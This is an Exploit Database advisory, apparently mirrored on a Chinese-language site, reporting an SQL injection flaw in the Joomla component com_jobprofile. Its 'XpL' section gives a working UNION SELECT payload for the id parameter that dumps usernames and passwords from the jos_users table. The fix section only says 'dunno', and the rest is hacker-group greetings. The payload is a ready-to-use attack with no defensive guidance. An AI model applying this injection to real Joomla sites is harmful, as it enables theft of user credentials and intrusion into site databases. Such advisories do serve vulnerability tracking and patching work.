Joomla! Component com_jobprofile – SQL Injection

• Exploit Database
• 11 阅读

• 作者： kaMtiEz
  日期： 2011-12-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18192/

• [~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability
  [~] Author : kaMtiEz (kamtiez@exploit-id.com)
  [~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
  [~] Date : 2 Dec , 2011
  
  [ Software Information ]
  
  [+] Vendor : http://www.thakkertech.com/
  [+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924
  [+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html
  [+] Version : null / 1.0 maybe :D
  [+] Price : 25,00 
  [+] Vulnerability : SQL INJECTION
  [+] Dork : "think it :D"
  [+] LOCATION :INDONESIA -
  
  [ Vulnerable File ]
  
   http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]
  
  [ XpL ]
  
   http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--
  
  [ FIX ]
  
   dunno :">
   
  [ Thx TO ]
  
  [+] INDONESIANCODER – EXPLOIT-ID – MAGELANGCYBER TEAM – MALANGCYBER CREW – KILL-9
  [+] Tukulesto,arianom,el-farhatz,Jundab,ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa,t3ll0
  [+] f4ckMen,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpret0,Dr.Cruzz
  [+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo,zaenal,gepenk ~ etc etc
  
  [ NOTE ]
  
  [+] let it be ..
  [+] be yourself ;)
  
  [ QUOTE ]
  
  [+] INDONESIANCODER still r0x
  [+] nothing secure ..